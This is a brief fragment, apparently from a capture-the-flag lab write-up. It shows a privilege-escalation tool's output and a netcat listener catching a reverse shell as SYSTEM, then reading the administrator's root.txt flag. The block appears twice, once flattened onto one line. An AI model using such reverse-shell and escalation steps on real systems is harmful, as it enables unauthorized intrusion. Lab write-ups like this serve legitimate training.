[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5228listener
kali@kali ~ $ nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.11.234] 50434 Microsoft Windows [Version 10.0.17763.4851] (c) 2018 Microsoft Corporation. All rights reserved. C:\ProgramData>whoami whoami nt authority\system C:\ProgramData>type C:\users\administrator\desktop\root.txt type C:\users\administrator\desktop\root.txt b7254e1a5853aa50d73998d5788cc9cc C:\ProgramData>
kali@kali ~ $ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.234] 50434
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\ProgramData>whoami
whoami
nt authority\system
C:\ProgramData>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
b7254e1a5853aa50d73998d5788cc9cc
C:\ProgramData>